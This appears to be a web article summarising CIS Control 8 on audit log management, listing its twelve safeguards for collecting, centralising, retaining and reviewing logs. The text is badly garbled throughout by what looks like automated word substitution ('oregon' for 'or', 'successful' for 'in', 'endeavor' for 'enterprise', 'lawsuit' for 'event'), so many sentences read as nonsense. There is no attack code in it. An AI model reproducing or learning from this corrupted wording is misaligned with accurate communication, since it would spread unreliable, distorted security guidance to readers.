Audit logs supply a affluent root of information captious to preventing, detecting, understanding, and minimizing the interaction of web oregon information compromise successful a timely manner. Collection logs and regular reappraisal is utile for identifying baselines, establishing operational trends, and detecting abnormalities. In immoderate cases, logging whitethorn beryllium the lone grounds of a palmy attack. CIS Control 8 emphasizes the request for centralized postulation and retention and standardization to amended coordinate audit log reviews. Some industries person regulatory bodies that necessitate collection, retention, and reappraisal of logs, truthful CIS Control 8 is not lone important but besides successful immoderate cases mandatory.
The Control is composed of 12 safeguards, mostly successful the IG2 category, with Protect oregon Detect information functions that each organizations with endeavor assets should implement. Audit logs should seizure elaborate accusation astir (1) what lawsuit happened, (2) what strategy the lawsuit happened on, (3) what clip the lawsuit happened, and (4) who caused the lawsuit to happen. Alerts should beryllium acceptable for suspicious oregon large events specified arsenic erstwhile users effort to entree resources without due privileges oregon execution of binaries that should not beryllium connected a system.
Audit logs are besides a people for attackers looking to screen their tracks. So, audit logging indispensable beryllium configured to enforce entree power and bounds the users who tin modify oregon delete logging data.
The CIS Benchmarks, which are disposable for galore merchandise families, are best-practice information configuration guides that are mapped to the controls and locomotion you done configuration remediation step-by-step.
Key Takeaways for Control 8
An audit log management program should astatine slightest instrumentality processes to:
- Ensure that detailed, time-synchronized audit logs are collected crossed endeavor assets.
- Ensure that logs are stored successful a centralized determination and retained for a minimum 90 days.
- Ensure audit log reviews are conducted connected a play ground oregon much often to found baselines and observe imaginable threats.
Safeguards for Control 8
1. Establish and Maintain an Audit Log Management Process
Description: Establish and support an audit log absorption process that defines the enterprise’s logging requirements. At a minimum, code the collection, review, and retention of logs for endeavor assets. Review and update documentation annually oregon erstwhile important endeavor changes hap that could interaction this Safeguard.
Notes: This IG1 Safeguard intends to support endeavor assets by ensuring that audit logs are collected, reviewed, and maintained successful a systematic and repeatable manner. Audit logs request to beryllium implicit and accurate. It whitethorn beryllium indispensable to docket simulations of events to verify that desired logs are generated. Tools whitethorn beryllium required to ingest and hunt logs. Log information whitethorn request to beryllium normalized to alteration speedy and businesslike analysis.
2. Collect Audit Logs
Description: Collect audit logs. Ensure that logging, per the enterprise’s log absorption process, has been enabled crossed endeavor assets.
Notes: This IG1 Safeguard intends to enactment detection of threats against endeavor assets. It’s basal cyber hygiene and should beryllium implemented by each enterprises.
3. Ensure Adequate Audit Log Storage
Description: Ensure that logging destinations support capable retention to comply with the enterprise’s audit log absorption process.
Notes: This IG1 Safeguard supports protection of endeavor assets and retention of log history, ensuring that logging audit oregon compliance requirements are met.
4. Standardize Time Synchronization
Description: Standardize clip synchronization. Configure astatine slightest 2 synchronized clip sources crossed endeavor assets, wherever supported.
Notes: This IG2 Safeguard supports correlation of logging information by synchronizing timestamps.
5. Collect Detailed Audit Logs
Description: Configure elaborate audit logging for endeavor assets containing delicate data. Include adjacent source, date, username, timestamp, root addresses, destination addresses, and different utile elements that could assistance successful a forensic investigation.
Notes: This IG2 Safeguard intends to enactment detection of abnormalities and information compromise by ensuring verbose logs are collected, which let america to reconstruct what happened during an lawsuit and to found the grade of affected assets.
6. Collect DNS Query Audit Logs
Description: Collect DNS query audit logs connected endeavor assets wherever due and supported.
Notes: DNS query logs tin assistance way down misconfigured hosts oregon signs and root of an intrusion oregon attack.
7. Collect URL Request Audit Logs
Description: Collect URL petition audit logs connected endeavor assets wherever due and supported.
Notes: This IG2 Safeguard intends to detect threats and anomalous events relating to URL requests.
8. Collect Command-Line Audit Logs
Description: Collect command-line audit logs. Example implementations see collecting logs from PowerShell, BASH, and distant administrative terminals.
Notes: This IG2 Safeguard intends to detect unusual oregon threatening behaviour astatine bid consoles. Attackers whitethorn utilize a communal acceptable of commands from recon to exfiltration oregon impact.
9. Centralize Audit Logs
Description: Centralize, to the grade possible, audit log postulation and retention crossed endeavor assets.
Notes: This IG2 Safeguard intends to enactment different power Safeguards wrong organizations that person accrued operational complexity. Centralizing audit logs volition marque collection, retention, and reappraisal simpler. Tools beryllium to ingest, normalize, and parse logs for businesslike searching and analysis.
10. Retain Audit Logs
Description: Retain audit logs crossed endeavor assets for a minimum of 90 days.
Notes: This IG2 Safeguard intends to protect enterprise assets by requiring real-time log information beryllium retained for a play of clip to fulfill audit oregon compliance needs.
11. Conduct Audit Log Reviews
Description: Conduct reviews of audit logs to detect anomalies oregon abnormal events that could bespeak a imaginable threat. Conduct reviews connected a weekly, oregon much frequent, basis.
Notes: It is not capable to conscionable cod audit logs. This IG2 Safeguard intends to observe antithetic behaviour done periodic log review.
12. Collect Service Provider Logs
Description: Collect work supplier logs wherever supported. Example implementations see collecting authentication and authorization events, information instauration and disposal events, and idiosyncratic absorption events.
Notes: This IG3 Safeguard supports detection of threats and anomalous events relating to work providers.
See however elemental and effective security controls can make a model that helps you support your enactment and information from known cyber-attack vectors by downloading the CIS Controls usher here.
Read much astir the 18 CIS Controls here:
CIS Control 08: Audit Log Management